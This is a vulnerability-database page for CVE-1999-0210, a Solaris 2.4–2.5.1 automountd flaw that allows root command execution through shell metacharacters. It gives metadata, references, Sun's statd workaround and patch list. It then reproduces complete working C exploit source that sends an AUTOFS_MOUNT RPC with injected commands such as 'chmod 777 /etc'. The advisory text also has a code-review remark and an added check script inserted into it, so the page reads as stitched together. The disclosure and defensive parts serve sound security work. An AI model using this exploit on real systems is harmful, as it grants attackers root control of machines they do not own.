CVE-1999-0210
CVSS10.0
Published: 1997-11-26 00:00:00
Last revised: 2016-10-17 21:59:04

[Original] Automount daemon automountd allows local or remote users to gain privileges via shell metacharacters.


[CNNVD] Solaris automount vulnerability (CNNVD-199711-016)

        The automount daemon automountd contains a vulnerability; local or remote users can gain privileges by means of shell metacharacters.

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.5.1
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sun:solaris:2.5.1::x86

- OVAL (technical details for detection)

oval:org.mitre.oval:def:6076  automountd can run user programs as root.
*OVAL describes in detail how this vulnerability is detected; see the related OVAL definition for more technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0210
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0210
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199711-016
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=88053459921223&w=2
(UNKNOWN)  BUGTRAQ  19971126 Solaris 2.5.1 automountd exploit (fwd)
http://marc.info/?l=bugtraq&m=91547759121289&w=2
(UNKNOWN)  BUGTRAQ  19990103 SUN almost has a clue! (automountd)
http://www.cert.org/advisories/CA-99-05-statd-automountd.html
(VENDOR_ADVISORY)  CERT  CA-99-05
http://www.securityfocus.com/bid/235
(UNKNOWN)  BID  235
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9910-104
(UNKNOWN)  HP  HPSBUX9910-104

- Vulnerability information

Solaris automount vulnerability
Critical  Other
1997-11-26 00:00:00 2005-05-02 00:00:00
Remote / Local
        The automount daemon automountd contains a vulnerability; local or remote users can gain privileges by means of shell metacharacters.

- Advisory and patches

        Check the automountd manuals and see whether you require it for your particular instance. Statd doesn't run as root in Solaris 7, so the automounter will ignore its requests. This change was made late in Solaris 7 development and did not make it into any external release. The easiest way to work around this problem quickly is to run statd as a user other than root; to this end, change /etc/init.d/nfs.client as follows (but not on Solaris 7, where such a change may break statd):
        28c28
         < /usr/lib/nfs/statd > /dev/console 2>&1
         ---
         > su daemon -c /usr/lib/nfs/statd > /dev/console 2>&1
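Review bot: the hunk changes the statd start line unconditionally, while the surrounding text says the same edit may break statd on Solaris 7; add a comment above line 28 recording that the `su daemon -c /usr/lib/nfs/statd` form is the pre-Solaris 7 workaround, so the change is not carried forward blindly into a later release. Note also that only the start path is touched here; the chown/chmod of /var/statmon that the text requires is a separate manual step and is not reflected in the script.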
        (make sure you keep the links in /etc/rc?.d/[SK]*nfs.client pointing to /etc/init.d/nfs.client) and run:
        $ chown -R daemon /var/statmon
        $ chmod -R og-w /var/statmon
        Then stop and start lockd & statd.
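The following check script is an added example, not part of the advisory or of Sun's tooling: it verifies whether the statd workaround described above has been applied, looking for the "su daemon -c" start line in /etc/init.d/nfs.client and for the ownership and group/other-write bits on /var/statmon. The paths are taken from the advisory; the functions accept a path argument so they can be exercised against constructed files.

```shell
#!/bin/sh
# Added example, not part of the advisory: checks whether the statd
# workaround above has been applied. Paths come from the advisory text;
# the functions take the path as an argument so they can be tested offline.
NFS_CLIENT_SCRIPT="${NFS_CLIENT_SCRIPT:-/etc/init.d/nfs.client}"
STATMON_DIR="${STATMON_DIR:-/var/statmon}"

# 0 if every active line that launches statd does so via "su daemon -c",
# 1 if any uncommented line still starts /usr/lib/nfs/statd directly as root.
statd_drops_root() {
    script="$1"
    [ -r "$script" ] || return 1
    grep '^[^#]*/usr/lib/nfs/statd' "$script" | grep -vq 'su daemon -c' && return 1
    grep -q 'su daemon -c[[:space:]]*/usr/lib/nfs/statd' "$script"
}

# Prints the owner of DIR (expected: daemon after "chown -R daemon /var/statmon").
statmon_owner() {
    ls -ld "$1" | awk '{print $3}'
}

# 0 if nothing under DIR is group- or other-writable (chmod -R og-w applied).
statmon_no_og_write() {
    dir="$1"
    [ -d "$dir" ] || return 1
    [ -z "$(find "$dir" \( -perm -020 -o -perm -002 \) -print)" ]
}

# Human-readable report for the live system.
report() {
    if statd_drops_root "$NFS_CLIENT_SCRIPT"; then
        echo "OK:   statd is started as daemon in $NFS_CLIENT_SCRIPT"
    else
        echo "WARN: statd is still started as root in $NFS_CLIENT_SCRIPT (or file unreadable)"
    fi
    if [ "$(statmon_owner "$STATMON_DIR" 2>/dev/null)" = daemon ] && statmon_no_og_write "$STATMON_DIR"; then
        echo "OK:   $STATMON_DIR is owned by daemon and not group/other writable"
    else
        echo "WARN: $STATMON_DIR ownership or permissions not adjusted"
    fi
}

report
```

Run it as root on the affected host; on any other system it simply reports WARN for both checks.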
        Patches are available to all Sun customers at
        http://sunsolve.sun.com

        Sun Solaris 2.4 x86
          • Sun 101946-44 (x86)
        Sun Solaris 2.4
          • Sun 101945-50 (sparc)
        Sun Solaris 2.5 x86
          • Sun 103188-25 (x86)
        Sun Solaris 2.5.1 x86
          • Sun 104655-01 (x86)
        Sun Solaris 2.5.1
          • Sun 104654-03 (sparc)
- Vulnerability information (19199)

Solaris <= 2.5.1 automount Vulnerability (EDBID:19199)
solaris local
1997-11-26 Verified
0 Anonymous
source: http://www.securityfocus.com/bid/235/info

The automounter daemon (automountd) answers file system mount and unmount requests from the autofs filesystem via RPC. A vulnerability has been discovered that may allow an unauthorized user to send arbitrary commands to the automounter daemon. Given automountd's SUID root status, these commands are executed as root.

This bug was originally thought to be fixed by a Sun patch; however, subsequent findings by a bugtraq poster showed that the patch was insufficient. Moreover, it was initially thought that this bug was local only. Multiple parties later discovered that the problem could be exploited remotely by leveraging the attack off a remote vulnerability in rpc.statd. In particular, Solaris rpc.statd allows remote users to proxy RPC requests through itself so that they appear to have come from the localhost.

/*
this is really dumb automountd exploit, tested on solaris 2.5.1
./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
map is executed via popen with key given as argument, read automount(1M)

patch 10465[45] fixes this

*/

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <unistd.h>     /* gethostname() */
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s) {
    printf("Usage: %s mountpoint map key [opts]\n", s);
    exit(0);
}

/* XDR encoder for the AUTOFS_MOUNT request (name/map/opts/path strings) */
bool_t xdr_mntrequest(XDR *xdrs, mntrequest *objp)
{
    if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
        return (FALSE);
    if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
        return (FALSE);
    if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
        return (FALSE);
    if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
        return (FALSE);
    return (TRUE);
}

/* XDR decoder for the reply: a single integer status */
bool_t xdr_mntres(XDR *xdrs, mntres *objp)
{
    if (!xdr_int(xdrs, &objp->status))
        return (FALSE);
    return (TRUE);
}

int main(int argc, char *argv[]) {
    char hostname[MAXHOSTNAMELEN];
    CLIENT *cl;
    enum clnt_stat stat;
    struct timeval tm;
    struct mntrequest req;
    struct mntres result;

    if (argc < 4)
        usage(argv[0]);

    req.path = argv[1];
    req.map = argv[2];
    req.name = argv[3];
    req.opts = (argc > 4) ? argv[4] : "";   /* opts is optional; avoid NULL */
    if (gethostname(hostname, sizeof(hostname)) == -1) {
        perror("gethostname");
        exit(0);
    }
    /* RPC client to the local automountd over the datagram transport */
    if ((cl = clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
        clnt_pcreateerror("clnt_create");
        exit(0);
    }
    tm.tv_sec = 5;
    tm.tv_usec = 0;
    stat = clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
                     (char *)&result, tm);
    if (stat != RPC_SUCCESS)
        clnt_perror(cl, "mount call");
    else
        printf("mntres = %d.\n", result.status);
    clnt_destroy(cl);
    return 0;
}


- Vulnerability information

947
Sun automountd Shell Metacharacter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

1997-11-26 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete